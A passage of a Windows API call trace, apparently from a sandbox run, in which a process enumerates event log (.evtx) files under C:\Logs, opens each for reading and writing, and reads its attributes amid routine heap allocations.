app-Execution.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpUsedDefaultChar=0x0) returned 65 [0086.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0086.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0086.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0086.124] AreFileApisANSI () returned 1 [0086.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0086.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x829e8 [0086.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x829e8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 65 [0086.125] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.125] GetFileType (hFile=0x424) returned 0x1 [0086.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x829e8 | out: hHeap=0x20000) returned 1 [0086.125] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.125] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.125] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.125] CloseHandle (hObject=0x424) returned 1 [0086.126] AreFileApisANSI () returned 1 [0086.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0086.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82208 [0086.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 65 [0086.126] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.126] GetFileType (hFile=0x424) returned 0x1 [0086.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0086.126] CloseHandle (hObject=0x424) returned 1 [0086.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0086.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0086.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0086.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0086.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0086.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0086.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0086.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0086.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0086.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0086.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0086.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.127] AreFileApisANSI () returned 1 [0086.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0086.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82058 [0086.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 65 [0086.127] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0086.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.127] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.127] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cAlternateFileName="MIE36C~1.EVT")) returned 1 [0086.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0086.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0086.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0086.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0086.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0086.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0086.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0086.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.128] AreFileApisANSI () returned 1 [0086.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpUsedDefaultChar=0x0) returned 55 [0086.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0086.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0086.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0086.128] AreFileApisANSI () returned 1 [0086.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0086.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76188 [0086.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 55 [0086.129] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.129] GetFileType (hFile=0x424) returned 0x1 [0086.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0086.129] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.129] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.129] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.129] CloseHandle (hObject=0x424) returned 1 [0086.130] AreFileApisANSI () returned 1 [0086.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0086.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76278 [0086.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 55 [0086.130] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.130] GetFileType (hFile=0x424) returned 0x1 [0086.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.130] CloseHandle (hObject=0x424) returned 1 [0086.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0086.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0086.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0086.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0086.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.131] AreFileApisANSI () returned 1 [0086.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0086.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76098 [0086.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 55 [0086.131] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0086.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.131] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.131] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppReadiness%4Admin.evtx", cAlternateFileName="MIC5CB~1.EVT")) returned 1 [0086.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69490 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0086.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0086.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0086.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0086.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0086.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0086.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.132] AreFileApisANSI () returned 1 [0086.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx", lpUsedDefaultChar=0x0) returned 51 [0086.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0086.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0086.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0086.132] AreFileApisANSI () returned 1 [0086.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0086.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46748 [0086.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46748, cchWideChar=51 | out: 